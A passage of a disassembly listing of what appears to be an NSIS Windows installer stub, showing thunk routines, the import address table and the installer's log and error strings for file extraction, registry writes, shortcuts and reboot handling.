dd offset loc_4072CA
dd offset loc_406FF2
dd offset loc_406D82
dd offset loc_406F04
dd offset loc_40717E
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407478 proc near ; CODE XREF: sub_401610+E63�p
jmp ds:dword_408288
sub_407478 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40747E proc near ; CODE XREF: sub_401610+E4A�p
jmp ds:dword_408284
sub_40747E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407484 proc near ; CODE XREF: sub_401610+E16�p
jmp ds:dword_408280
sub_407484 endp
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 00001C72 ( 7282.)
; Section size in file : 00001C72 ( 7282.)
; Offset to raw data for section: 00008000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 408000h
dword_408000 dd 77DD839Fh ; DATA XREF: sub_401540+6C�r
dword_408004 dd 77DD81E3h ; DATA XREF: sub_401540+25�r
; sub_401610+1561�r
dword_408008 dd 77DD22EAh ; DATA XREF: sub_401540+1B�r
; sub_4015C7+34�r ...
dword_40800C dd 77DD7F3Eh ; DATA XREF: sub_401610+1574�r
dword_408010 dd 77DD5C55h ; DATA XREF: sub_401610+1320�r
dword_408014 dd 77DD590Bh ; DATA XREF: sub_401610+13E0�r
dword_408018 dd 77DD59F0h ; DATA XREF: sub_401610+148A�r
dword_40801C dd 77DD23D7h ; DATA XREF: sub_401610+14EB�r
; sub_405EF1+3D�r
dword_408020 dd 77DD189Ah ; DATA XREF: sub_401540+60�r
; sub_401540+7C�r ...
align 8
dword_408028 dd 77345219h ; DATA XREF: start+17�r
dword_40802C dd 77346144h ; DATA XREF: sub_404A94+BC�r
dword_408030 dd 77345719h ; DATA XREF: sub_404A94+443�r
dword_408034 dd 77345CA4h ; DATA XREF: sub_404A94+A8�r
dd 0
dword_40803C dd 77C7531Dh ; DATA XREF: sub_401610+BC1�r
dword_408040 dd 77C72889h ; DATA XREF: sub_401000+68�r
; sub_401610+BA8�r ...
dword_408044 dd 77C7E6D9h ; DATA XREF: sub_401000+CF�r
; sub_40403F+95�r
dword_408048 dd 77C7D47Ch ; DATA XREF: sub_401000+105�r
; sub_401610+C24�r
dword_40804C dd 77C71EFFh ; DATA XREF: sub_401000+126�r
; sub_40403F+4E�r
dword_408050 dd 77C71D83h ; DATA XREF: sub_401000+130�r
; sub_40403F+42�r
dword_408054 dd 77C71E2Eh ; DATA XREF: sub_40403F+71�r
dword_408058 dd 77C71BB0h ; DATA XREF: sub_401000+139�r
align 10h
dword_408060 dd 77E76A60h ; DATA XREF: sub_401610+EEE�r
dword_408064 dd 77F5157Dh ; DATA XREF: sub_401610:loc_4024E9�r
dword_408068 dd 77E79F93h ; DATA XREF: sub_401610+ECC�r start+97�r ...
dword_40806C dd 77E78C17h ; DATA XREF: sub_401610+E9B�r
; sub_401610+FED�r ...
dword_408070 dd 77E7FF65h ; DATA XREF: sub_401610+D93�r
; sub_401610+1A1D�r
dword_408074 dd 77E79D5Bh ; DATA XREF: sub_401610+D4A�r
; sub_401610+D82�r ...
dword_408078 dd 77E668D9h ; DATA XREF: sub_401610:loc_401E92�r
dword_40807C dd 77E7AC5Eh ; DATA XREF: sub_401610+871�r
dword_408080 dd 77E76A2Eh ; DATA XREF: sub_401610+84D�r
; start+33D�r ...
dword_408084 dd 77E77963h ; DATA XREF: sub_401610+6D7�r
; sub_401610:loc_402BAD�r ...
dword_408088 dd 77E7011Ah ; DATA XREF: sub_401610+6CE�r
dword_40808C dd 77E74CABh ; DATA XREF: sub_401610+599�r
; sub_405A5A+92�r ...
dword_408090 dd 77E71702h ; DATA XREF: sub_401610+575�r
dword_408094 dd 77E6CBF9h ; DATA XREF: sub_401610+3FC�r
dword_408098 dd 77E6C10Bh ; DATA XREF: sub_401610+3DA�r
; sub_406357+3D�r
dword_40809C dd 77E80357h ; DATA XREF: sub_401610+395�r
dword_4080A0 dd 77E71AFEh ; DATA XREF: sub_401610+330�r
dword_4080A4 dd 77E74155h ; DATA XREF: sub_401610+30D�r
; sub_401610+4C0�r ...
dword_4080A8 dd 77E705C5h ; DATA XREF: sub_401610+27C�r
dword_4080AC dd 77E70396h ; DATA XREF: sub_401610+20E�r
; sub_401610+5A4�r ...
dword_4080B0 dd 77E61BE6h ; DATA XREF: sub_401610+15C�r
dword_4080B4 dd 77E7751Ah ; DATA XREF: sub_403420+D�r
; sub_403420:loc_403513�r ...
dword_4080B8 dd 77E7A837h ; DATA XREF: sub_403756+213�r
; sub_405E7A+26�r ...
dword_4080BC dd 77E793EFh ; DATA XREF: sub_403756+68�r
; sub_406357+106�r
dword_4080C0 dd 77E805D8h ; DATA XREF: sub_401610+F1E�r
; sub_405A5A+1CD�r
dword_4080C4 dd 77E6808Fh ; DATA XREF: sub_403A62+21�r start+1C1�r ...
dword_4080C8 dd 77E75CB5h ; DATA XREF: start:loc_403F86�r
dword_4080CC dd 77E79C90h ; DATA XREF: start+43B�r
dword_4080D0 dd 77E6BD13h ; DATA XREF: start+34F�r
dword_4080D4 dd 77E73BEFh ; DATA XREF: start+8B�r sub_404258+15�r ...
dword_4080D8 dd 77E7C938h ; DATA XREF: start+85�r
dword_4080DC dd 77E705B0h ; DATA XREF: start+59�r sub_406357+CD�r ...
dword_4080E0 dd 77E6AD34h ; DATA XREF: start+44�r
dword_4080E4 dd 77E72D97h ; DATA XREF: sub_40410B:loc_40412A�r
dword_4080E8 dd 77E6869Bh ; DATA XREF: sub_40463C+25A�r
dword_4080EC dd 77E71B14h ; DATA XREF: sub_405202+377�r
dword_4080F0 dd 77E7166Fh ; DATA XREF: sub_405202+33E�r
dword_4080F4 dd 77E736A3h ; DATA XREF: sub_405202+334�r
; sub_405DBB+6�r ...
dword_4080F8 dd 77E7AC37h ; DATA XREF: sub_405202+1E0�r
dword_4080FC dd 77E61BB8h ; DATA XREF: sub_405D01+3C�r
dword_408100 dd 77E6AF8Fh ; DATA XREF: sub_405EA9+2D�r
dword_408104 dd 77E73167h ; DATA XREF: sub_405FFD�r sub_40622D+B�r ...
dword_408108 dd 77E74672h ; DATA XREF: sub_406003�r
; sub_4060AD+85�r ...
dword_40810C dd 77E70192h ; DATA XREF: sub_406357+243�r
dword_408110 dd 77E75090h ; DATA XREF: sub_406357+1F6�r
; sub_406357+222�r
dword_408114 dd 77E74D76h ; DATA XREF: sub_406357+13F�r
dword_408118 dd 77E77797h ; DATA XREF: sub_406357+125�r
dword_40811C dd 77E704FCh ; DATA XREF: sub_4065B7+114�r
dword_408120 dd 77E704DCh ; DATA XREF: sub_4067E6+1A6�r
dword_408124 dd 77E72CF4h ; DATA XREF: sub_4013E7+B5�r
; sub_401610+BD1�r ...
dword_408128 dd 77E73628h ; DATA XREF: sub_401610+196C�r
; start+7E�r ...
dword_40812C dd 77E7A5FDh ; DATA XREF: sub_401610+F34�r
; start+400�r ...
dword_408130 dd 77E80618h ; DATA XREF: sub_401610+FA0�r
dword_408134 dd 77E77CCEh ; DATA XREF: sub_401610+1135�r
dword_408138 dd 77E7070Eh ; DATA XREF: sub_401610+12AF�r
dword_40813C dd 77E73803h ; DATA XREF: sub_401610+1911�r
; sub_401610+1930�r ...
dword_408140 dd 77E72C64h ; DATA XREF: sub_401610+12ED�r
dword_408144 dd 77E79D8Ch ; DATA XREF: sub_401610+160F�r
; sub_401610+1927�r ...
dword_408148 dd 77E78B82h ; DATA XREF: sub_401610+1664�r
; sub_4033D7+17�r ...
dword_40814C dd 77E78C81h ; DATA XREF: sub_401610+16C8�r
; sub_401610+16F7�r ...
dword_408150 dd 77E78EAAh ; DATA XREF: sub_401610+171C�r
; sub_406168+2C�r ...
dword_408154 dd 77E75E67h ; DATA XREF: sub_401610+173E�r
; sub_4067E6+166�r
dword_408158 dd 77E75D9Eh ; DATA XREF: sub_401610+1769�r
; sub_406168+1A�r ...
dword_40815C dd 77E7A099h ; DATA XREF: sub_403756+36�r start+32B�r
dd 0
dword_408164 dd 77428B97h ; DATA XREF: sub_401610+CC8�r
; sub_40428C+211�r
dword_408168 dd 774E3824h ; DATA XREF: sub_40463C+15B�r
dword_40816C dd 77423391h ; DATA XREF: sub_405CD6+8�r
dword_408170 dd 773F6FB6h ; DATA XREF: sub_4065B7+151�r
dword_408174 dd 7746135Fh ; DATA XREF: sub_401610+11ED�r
dword_408178 dd 77423EAEh ; DATA XREF: sub_4041F2+38�r
; sub_4065B7+160�r
align 10h
dword_408180 dd 77D4B816h ; DATA XREF: sub_401610+AB�r
dword_408184 dd 77D5BB6Ch ; DATA XREF: .text:00403396�r
; sub_40410B+B2�r ...
dword_408188 dd 77D444F0h ; DATA XREF: .text:00403344�r
dword_40818C dd 77D49A11h ; DATA XREF: sub_403420+1EB�r
; sub_403756+195�r ...
dword_408190 dd 77D5E69Dh ; DATA XREF: sub_403420+11C�r
; sub_403756+15B�r ...
dword_408194 dd 77D902E3h ; DATA XREF: start+479�r
dword_408198 dd 77D472ECh ; DATA XREF: start+C0�r sub_405DCA+D�r ...
dword_40819C dd 77D4432Ah ; DATA XREF: sub_40403F+2D�r
; sub_40428C+CB�r
dword_4081A0 dd 77D43FEDh ; DATA XREF: sub_40403F+1A�r
; sub_404A94+229�r
dword_4081A4 dd 77D47EE5h ; DATA XREF: sub_40428C+1C0�r
dword_4081A8 dd 77D4630Dh ; DATA XREF: sub_40428C+1BA�r
dword_4081AC dd 77D4FF4Ah ; DATA XREF: sub_40428C+88�r
dword_4081B0 dd 77D4932Ch ; DATA XREF: sub_40463C+65�r
dword_4081B4 dd 77D4FF23h ; DATA XREF: sub_40463C+4B�r
dword_4081B8 dd 77D481CDh ; DATA XREF: sub_404961+22�r
; sub_405597+42E�r
dword_4081BC dd 77D4822Bh ; DATA XREF: sub_404961+6�r
dword_4081C0 dd 77D5BA26h ; DATA XREF: sub_4049AD+DB�r
dword_4081C4 dd 77D4747Ch ; DATA XREF: sub_4049AD+4C�r
dword_4081C8 dd 77D5BC81h ; DATA XREF: sub_404A94+83�r
dword_4081CC dd 77D5E303h ; DATA XREF: sub_405202+388�r
dword_4081D0 dd 77D6BB4Ch ; DATA XREF: sub_405202+382�r
dword_4081D4 dd 77D6BB30h ; DATA XREF: sub_405202+32B�r
dword_4081D8 dd 77D5E310h ; DATA XREF: sub_405202+325�r
dword_4081DC dd 77D7BF7Ah ; DATA XREF: sub_405202+2E3�r
dword_4081E0 dd 77D45F74h ; DATA XREF: sub_405202+2C1�r
; sub_405597+422�r
dword_4081E4 dd 77D5DD3Ah ; DATA XREF: sub_405202+2AE�r
dword_4081E8 dd 77D49B9Ch ; DATA XREF: sub_405202+299�r
dword_4081EC dd 77D477C0h ; DATA XREF: sub_405202+CE�r
dword_4081F0 dd 77D4F5CBh ; DATA XREF: sub_405597+48C�r
dword_4081F4 dd 77D5D417h ; DATA XREF: sub_405597+1D0�r
dword_4081F8 dd 77D47C8Bh ; DATA XREF: sub_405597+B6�r
; sub_405597+103�r
dword_4081FC dd 77D49525h ; DATA XREF: sub_405597+3C�r
; sub_405597+449�r
dword_408200 dd 77D650B3h ; DATA XREF: sub_405A5A+237�r
dword_408204 dd 77D5D8BAh ; DATA XREF: sub_405A5A:loc_405C45�r
dword_408208 dd 77D414D4h ; DATA XREF: sub_405A5A+191�r
dword_40820C dd 77D4BBDBh ; DATA XREF: sub_405A5A+158�r
dword_408210 dd 77D4DC11h ; DATA XREF: sub_405A5A+140�r
; sub_405A5A+218�r
dword_408214 dd 77D6272Dh ; DATA XREF: sub_405D57�r
dword_408218 dd 77D6274Fh ; DATA XREF: sub_405D5D+13�r
dword_40821C dd 77D6ADD7h ; DATA XREF: sub_405D79+39�r
dword_408220 dd 77D4C783h ; DATA XREF: sub_40614C+E�r
dword_408224 dd 77D47F34h ; DATA XREF: sub_401610+175�r
dword_408228 dd 77D47D27h ; DATA XREF: sub_401610+1CA�r
; sub_401610+C5B�r ...
dword_40822C dd 77D47322h ; DATA XREF: sub_401610+4D9�r
; sub_401610+1821�r ...
dword_408230 dd 77D4C96Ah ; DATA XREF: sub_401610+972�r
; sub_401610+C9A�r ...
dword_408234 dd 77D5C3E2h ; DATA XREF: sub_401610+A9C�r
dword_408238 dd 77D651AFh ; DATA XREF: sub_401610+AE3�r
dword_40823C dd 77D45B19h ; DATA XREF: sub_401610+B06�r
dword_408240 dd 77D48AA8h ; DATA XREF: sub_401610+B2E�r
; sub_401610+B5A�r ...
dword_408244 dd 77D49951h ; DATA XREF: sub_401610+B4B�r
; sub_404A94+96�r ...
dword_408248 dd 77D4D42Bh ; DATA XREF: sub_401610+B8B�r
; sub_405A5A+F9�r
dword_40824C dd 77D45F40h ; DATA XREF: sub_401610+BBA�r
dword_408250 dd 77D4816Dh ; DATA XREF: sub_401610:loc_402276�r
; sub_403FFA+A�r ...
dword_408254 dd 77D46E60h ; DATA XREF: sub_401610+D59�r
; sub_401610+19E7�r ...
dword_408258 dd 77D441F2h ; DATA XREF: sub_401610+D65�r
; sub_401610+19F3�r ...
dword_40825C dd 77D4590Ch ; DATA XREF: sub_401610+1BAD�r
dword_408260 dd 77D46F5Bh ; DATA XREF: sub_401000+2C�r
dword_408264 dd 77D458EEh ; DATA XREF: sub_401000+47�r
dword_408268 dd 77D45F23h ; DATA XREF: sub_401000+5B�r
; sub_401610+B67�r ...
dword_40826C dd 77D463A6h ; DATA XREF: sub_401000+E4�r
dword_408270 dd 77D5C7A1h ; DATA XREF: sub_401000+156�r
dword_408274 dd 77D458FDh ; DATA XREF: sub_401000+16E�r
dword_408278 dd 77D4702Fh ; DATA XREF: sub_4013E7+C4�r
; sub_401610+AB4�r ...
align 10h
dword_408280 dd 77C015E3h ; DATA XREF: sub_407484�r
dword_408284 dd 77C0162Dh ; DATA XREF: sub_40747E�r
dword_408288 dd 77C0167Dh ; DATA XREF: sub_407478�r
align 10h
dword_408290 dd 771F5164h ; DATA XREF: start+2BF�r sub_405177+7B�r
dword_408294 dd 771C8E66h ; DATA XREF: start+1E�r sub_405177+10�r
dword_408298 dd 771C1E56h ; DATA XREF: sub_401610+107E�r
align 10h
aLoggingSetToD db 'logging set to %d',0 ; DATA XREF: sub_401610+1A61�o
align 4
aSettingsLoggin db 'settings logging to %d',0 ; DATA XREF: sub_401610+1A53�o
align 4
aFileExtracti_0 db 'File Extraction: failed createprocess on uninstaller ("%s")',0
; DATA XREF: sub_401610+1A3D�o
aFileExtraction db 'File Extraction: success ("%s")',0 ; DATA XREF: sub_401610+19C5�o
a_? db '" _?=',0 ; DATA XREF: sub_401610+19A6�o
align 10h
asc_408330 db ' /x "',0 ; DATA XREF: sub_401610+1992�o
align 4
aCreatedUninsta db 'created uninstaller: %d, "%s"',0 ; DATA XREF: sub_401610+1952�o
align 4
aWriteregErrorC db 'WriteReg: error creating key %d\%s',0 ; DATA XREF: sub_401610+14A5�o
align 4
aWriteregbinSet db 'WriteRegBin: set %d\%s\%s with %d bytes',0 ; DATA XREF: sub_401610+1471�o
aWriteregdwordS db 'WriteRegDWORD: set %d\%s\%s to %d',0 ; DATA XREF: sub_401610+1443�o
align 4
aWriteregstrSet db 'WriteRegStr: set %d\%s\%s to %s',0 ; DATA XREF: sub_401610+1416�o
aDeleteregkeyDS db 'DeleteRegKey: %d\%s',0 ; DATA XREF: sub_401610+1355�o
aDeleteregvalue db 'DeleteRegValue: %d\%s\%s',0 ; DATA XREF: sub_401610+1331�o
align 4
aWriteinistrWro db 'WriteINIStr: wrote [%s] %s=%s in %s',0 ; DATA XREF: sub_401610+1298�o
aRm db '<RM>',0 ; DATA XREF: sub_401610+1232�o
align 4
aCopyfilesSS db 'CopyFiles "%s"->"%s"',0 ; DATA XREF: sub_401610+118B�o
align 10h
aCreateshortcut db 'CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d'
; DATA XREF: sub_401610+105F�o
db 0
align 4
aErrorRegiste_1 db 'Error registering DLL: Could not initialize OLE',0
; DATA XREF: sub_401610+FE0�o
aErrorRegiste_0 db 'Error registering DLL: Could not load ',27h,'%s',27h,' -> ',27h,'%s',27h,0
; DATA XREF: sub_401610+FCA�o
align 4
aErrorRegisteri db 'Error registering DLL: %s not found in %s',0
; DATA XREF: sub_401610+F8B�o
align 4
aRegdllCouldNot db 'RegDLL: Could not load ',27h,'%s',27h,' -> ',27h,'%s',27h,0
; DATA XREF: sub_401610+F0E�o
asc_408558: ; DATA XREF: sub_401610+E5B�o
; sub_4061A6+1B�o ...
unicode 0, <\>,0
aExecFailedCrea db 'Exec: failed createprocess ("%s")',0 ; DATA XREF: sub_401610+DC6�o
align 10h
aExecSuccessS db 'Exec: success ("%s")',0 ; DATA XREF: sub_401610+D33�o
align 4
aExecCommandS db 'Exec: command="%s"',0 ; DATA XREF: sub_401610+D08�o
align 4
aExecshellSucce db 'ExecShell: success ("%s": file:"%s" params:"%s")',0
; DATA XREF: sub_401610+CEC�o
align 10h
aExecshellWarni db 'ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d',0
; DATA XREF: sub_401610+CD7�o
align 4
aSS db '%s %s',0 ; DATA XREF: sub_401610+C8E�o
align 4
aHidewindow db 'HideWindow',0 ; DATA XREF: sub_401610+C48�o
align 10h
aPopStackEmpty db 'Pop: stack empty',0 ; DATA XREF: sub_401610+9E2�o
align 4
aExchStackDElem db 'Exch: stack < %d elements',0 ; DATA XREF: sub_401610+99C�o
align 10h
aRmdirS db 'RMDir: "%s"',0 ; DATA XREF: sub_401610+785�o
aMessageboxDS db 'MessageBox: %d,"%s"',0 ; DATA XREF: sub_401610+742�o
aDeleteS db 'Delete: "%s"',0 ; DATA XREF: sub_401610+72D�o
align 10h
aS db '%s',0 ; DATA XREF: sub_401610+707�o
; sub_401610+1A90�o
align 4
aFileWroteDToS db 'File: wrote %d to "%s"',0 ; DATA XREF: sub_401610+6AC�o
align 4
aFileErrorUserC db 'File: error, user cancel',0 ; DATA XREF: sub_401610:loc_401C7D�o
align 4
aFileSkippedSOv db 'File: skipped: "%s" (overwriteflag=%d)',0 ; DATA XREF: sub_401610+65B�o
align 10h
aFileErrorUserA db 'File: error, user abort',0 ; DATA XREF: sub_401610+62E�o
aFileErrorUserR db 'File: error, user retry',0 ; DATA XREF: sub_401610+61B�o
aFileErrorCreat db 'File: error creating "%s"',0 ; DATA XREF: sub_401610+5D3�o
align 4
aFileOverwritef db 'File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"',0
; DATA XREF: sub_401610+50E�o
align 4
aRenameFailedS db 'Rename failed: %s',0 ; DATA XREF: sub_401610+376�o
align 4
aRenameOnReboot db 'Rename on reboot: %s',0 ; DATA XREF: sub_401610+364�o
align 4
aRenameS db 'Rename: %s',0 ; DATA XREF: sub_401610+320�o
align 10h
asc_4087B0 db '->',0 ; DATA XREF: sub_401610+313�o
align 4
aIffileexists_0 db 'IfFileExists: file "%s" does not exist, jumping %d',0
; DATA XREF: sub_401610+2BB�o
align 4
aIffileexistsFi db 'IfFileExists: file "%s" exists, jumping %d',0
; DATA XREF: sub_401610+2A5�o
align 4
aCreatedirector db 'CreateDirectory: "%s" (%d)',0 ; DATA XREF: sub_401610+240�o
align 10h
aSetfileattri_0 db 'SetFileAttributes failed.',0 ; DATA XREF: sub_401610+21C�o
align 4
aSetfileattribu db 'SetFileAttributes: "%s":%08X',0 ; DATA XREF: sub_401610+1FD�o
align 4
aBringtofront db 'BringToFront',0 ; DATA XREF: sub_401610:loc_401777�o
align 4
aSleepD db 'Sleep(%d)',0 ; DATA XREF: sub_401610+147�o
align 4
aDetailprintS db 'detailprint: %s',0 ; DATA XREF: sub_401610+123�o
aCallD db 'Call: %d',0 ; DATA XREF: sub_401610+D5�o
align 4
aAbortingS db 'Aborting: "%s"',0 ; DATA XREF: sub_401610+7F�o
align 4
aJumpD db 'Jump: %d',0 ; DATA XREF: sub_401610+63�o
align 10h
a___D db '... %d%%',0 ; DATA XREF: .text:004033BB�o
align 4
aUnpackingDataD db 'unpacking data: %d%%',0 ; DATA XREF: sub_403420+108�o
align 8
aTheInstallerYo db 'The installer you are trying to use is corrupted or incomplete.',0Ah
; DATA XREF: sub_403756:loc_4039F6�o
db 'This could be the result of a damaged disk, a failed download or '
db 'a virus.',0Ah
db 0Ah
db 'You may want to contact the author of this installer to obtain a '
db 'new copy.',0Ah
db 0Ah
db 'It may be possible to skip this check using the /NCRC command lin'
db 'e switch',0Ah
db '(NOT RECOMMENDED).',0
align 10h
aErrorWritingTe db 'Error writing temporary file. Make sure your temp folder is valid'
; DATA XREF: sub_403756+223�o start+D�o
db '.',0
align 4
aVerifyingInsta db 'verifying installer: %d%%',0 ; DATA XREF: sub_403756+148�o
align 10h
aErrorLaunching db 'Error launching installer',0 ; DATA XREF: sub_403756+56�o
; start+274�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: start+44F�o
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: start+41A�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: start+40E�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: start+406�o
align 4
aAdvapi32_dll db 'ADVAPI32.dll',0 ; DATA XREF: start+3ED�o
align 4
a_?_0 db ' _?=',0 ; DATA XREF: start+394�o
align 4
asc_408B0C db '" ',0 ; DATA XREF: start:loc_403E67�o
align 10h
aOutOfMemory db 'Out of Memory',0 ; DATA XREF: start:loc_403D48�o
align 10h
aExtractionPath db 'Extraction pathname not properly delimited.',0Ah
; DATA XREF: start:loc_403D41�o
db 0Ah
db 'Try using quotes or a shorter path.',0
align 4
aCNsis_extractf db 'C:\NSIS_ExtractFiles\',0 ; DATA XREF: start+228�o
align 4
aTemp db '\Temp',0 ; DATA XREF: start+5F�o
align 4
aNsisError_0 db 'NSIS Error',0 ; DATA XREF: start+24�o
align 10h
aInstall_log db 'install.log',0 ; DATA XREF: sub_4040E9�o
aOpen db 'open',0 ; DATA XREF: sub_40428C+209�o
align 4
aU_USS db '%u.%u%s%s',0 ; DATA XREF: sub_404578+5A�o
word_408BBE dw 0 ; DATA XREF: sub_40463C:loc_4048F7�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40463C+217�o
aKernel32_dll db 'KERNEL32.dll',0 ; DATA XREF: sub_40463C:loc_40483F�o
; sub_406357+7�o
align 4
aSectionS db 'Section: "%s"',0 ; DATA XREF: sub_405177+43�o
align 4
aSkippingSectio db 'Skipping section: "%s"',0 ; DATA XREF: sub_405177+34�o
align 4
aNewInstallOfST db 'New install of "%s" to "%s"',0 ; DATA XREF: sub_405202+B2�o
a_exe db '.exe',0 ; DATA XREF: sub_405A5A+81�o
align 10h
aD db '%d',0 ; DATA XREF: sub_405F5B+4�o
align 4
a? db '*?|<>/":',0 ; DATA XREF: sub_406009+52�o
align 10h
asc_408C40 db 0Dh,0Ah,0 ; DATA XREF: sub_4060AD+6E�o
align 4
asc_408C44 db 0Ah ; DATA XREF: sub_406357:loc_4064DD�o
db '[',0
align 4
aRename db '[Rename]',0Dh,0Ah,0 ; DATA XREF: sub_406357+14F�o
; sub_406357+15E�o
align 4
aWininit_ini db '\wininit.ini',0 ; DATA XREF: sub_406357+D3�o
align 4
aSS_0 db '%s=%s',0Dh,0Ah,0 ; DATA XREF: sub_406357+B2�o
aNul db 'NUL',0 ; DATA XREF: sub_406357:loc_4063D7�o
aMovefileexa db 'MoveFileExA',0 ; DATA XREF: sub_406357+1A�o
aCProgramFiles db 'C:\Program Files',0 ; DATA XREF: sub_4065B7+FD�o
align 10h
aProgramfilesdi db 'ProgramFilesDir',0 ; DATA XREF: sub_4065B7+E4�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion',0 ; DATA XREF: sub_4065B7+CF�o
; sub_4065B7+E9�o
align 4
aCommonfilesdir db 'CommonFilesDir',0 ; DATA XREF: sub_4065B7+CA�o
align 4
aMicrosoftInter db '\Microsoft\Internet Explorer\Quick Launch',0 ; DATA XREF: sub_4065B7+B7�o
align 4
aRmdirRemoved_1 db 'RMDir: RemoveDirectory failed("%s")',0
; DATA XREF: sub_4067E6:loc_4069BA�o
aRmdirRemoved_0 db 'RMDir: RemoveDirectory on Reboot("%s")',0 ; DATA XREF: sub_4067E6+1B7�o
align 4
aRmdirRemovedir db 'RMDir: RemoveDirectory("%s")',0 ; DATA XREF: sub_4067E6+199�o
align 4
aDeleteDelete_1 db 'Delete: DeleteFile failed("%s")',0 ; DATA XREF: sub_4067E6:loc_406929�o
aDeleteDelete_0 db 'Delete: DeleteFile on Reboot("%s")',0 ; DATA XREF: sub_4067E6+125�o
align 4
aDeleteDeletefi db 'Delete: DeleteFile("%s")',0 ; DATA XREF: sub_4067E6+F6�o
align 4
a_ db '\*.*',0 ; DATA XREF: sub_4067E6+6A�o
align 4
dword_408DDC dd 214EEh, 0 ; DATA XREF: sub_401610+1070�o
dd 0C0h, 46000000h
dword_408DEC dd 21401h, 0 ; DATA XREF: sub_401610+1079�o
dd 0C0h, 46000000h
dword_408DFC dd 10Bh, 0 ; DATA XREF: sub_401610+1095�o
dd 0C0h, 46000000h, 8EE8h, 2 dup(0)
dd 919Eh, 8028h, 9140h, 2 dup(0)
dd 91EEh, 8280h, 8F20h, 2 dup(0)
dd 9656h, 8060h, 9040h, 2 dup(0)
dd 9A68h, 8180h, 8EFCh, 2 dup(0)
dd 9AFAh, 803Ch, 8EC0h, 2 dup(0)
dd 9B9Ah, 8000h, 9024h, 2 dup(0)
dd 9C26h, 8164h, 9150h, 2 dup(0)
dd 9C68h, 8290h, 5 dup(0)
dd 9B04h, 9B22h, 9B30h, 9B40h, 9B88h, 9B76h, 9B64h, 9B50h
dd 9B14h, 0
dd 80000011h, 9174h, 9160h, 918Ah, 0
dd 9ADCh, 9ACCh, 9AB6h, 9AA0h, 9A94h, 9A84h, 9AECh, 9A74h
dd 0
dd 92F8h, 930Ah, 931Ah, 932Eh, 933Eh, 9354h, 936Ah, 9386h
dd 93A0h, 93ACh, 93BAh, 93C8h, 93DEh, 93F0h, 93FEh, 9412h
dd 9426h, 9432h, 943Eh, 9456h, 946Ch, 9474h, 9484h, 9492h
dd 92E8h, 94B6h, 94CAh, 94D8h, 94ECh, 94F8h, 9504h, 9516h
dd 952Eh, 953Eh, 9556h, 956Ah, 957Ah, 9588h, 9596h, 95A6h
dd 95B8h, 95CCh, 95D8h, 95E4h, 95F4h, 9606h, 9616h, 962Ch
dd 9642h, 91FAh, 9204h, 92D6h, 92C8h, 92B2h, 9294h, 9212h
dd 9278h, 926Ch, 9260h, 924Eh, 9242h, 9232h, 9220h, 94A0h
dd 0
dd 9BBCh, 9BE4h, 9BFAh, 9C08h, 9BA8h, 9BCCh, 0
dd 97B2h, 97C4h, 97D6h, 97E2h, 97F2h, 9808h, 9818h, 9824h
dd 9832h, 9844h, 9852h, 985Eh, 9870h, 9884h, 989Ah, 98ACh
dd 98BCh, 98CEh, 98E0h, 98EEh, 9900h, 9914h, 9926h, 9936h
dd 9948h, 9958h, 9966h, 9978h, 998Ch, 9998h, 99A8h, 99BAh
dd 99CAh, 99DCh, 99ECh, 99FEh, 9A16h, 9A28h, 9A3Ah, 9A4Ch
dd 9A5Ah, 979Ch, 978Eh, 9782h, 9776h, 9760h, 9750h, 9744h
dd 9736h, 9724h, 9716h, 970Eh, 96FEh, 96EEh, 96DAh, 96C8h
dd 96A6h, 9698h, 9688h, 967Ch, 9670h, 9664h, 96B8h, 0
dd 91D4h, 91BEh, 91ACh, 0
dd 9C46h, 9C58h, 9C32h, 0
dd 6D490038h, 4C656761h, 5F747369h, 74736544h, 796F72h
dd 6D490034h, 4C656761h, 5F747369h, 4D646441h, 656B7361h
dd 370064h, 67616D49h, 73694C65h, 72435F74h, 65746165h
dd 4F430000h, 4C54434Dh, 642E3233h, 6C6Ch, 6556000Ah, 65755172h
dd 61567972h, 4165756Ch, 0
aGetfileversion db 'GetFileVersionInfoA',0
db 1
align 2
aGetfileversi_0 db 'GetFileVersionInfoSizeA',0
aVersion_dll db 'VERSION.dll',0
dw 26Ah
aMuldiv db 'MulDiv',0
align 4
db '|',0
aDeletefilea db 'DeleteFileA',0
dw 1F5h
aGlobalfree db 'GlobalFree',0
align 10h
db '',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
db '',0
aFindnextfilea db 'FindNextFileA',0
db '',0
aFindclose db 'FindClose',0
dw 30Eh
aSetfilepointer db 'SetFilePointer',0
align 10h
db 0A9h ;
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
db 94h ;
db 3, 57h, 72h
aItefile db 'iteFile',0
db 94h ;
db 1, 47h, 65h
aTprivateprofil db 'tPrivateProfileStringA',0
align 4
db 99h ;
db 3, 57h, 72h
aIteprivateprof db 'itePrivateProfileStringA',0
align 2
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
aQ db '',0
aFreelibrary db 'FreeLibrary',0
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0248h, 694C6461h, 72617262h, 4179h, 6F4600EAh, 74616D72h
dd 7373654Dh, 41656761h, 1690000h, 4C746547h, 45747361h
dd 726F7272h, 1770000h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 3080000h, 45746553h, 726F7272h, 65646F4Dh
dd 1520000h
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
db 83h ;
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 150h
aGetenvironment db 'GetEnvironmentVariableA',0
db 0B3h ;
db 3, 6Ch, 73h
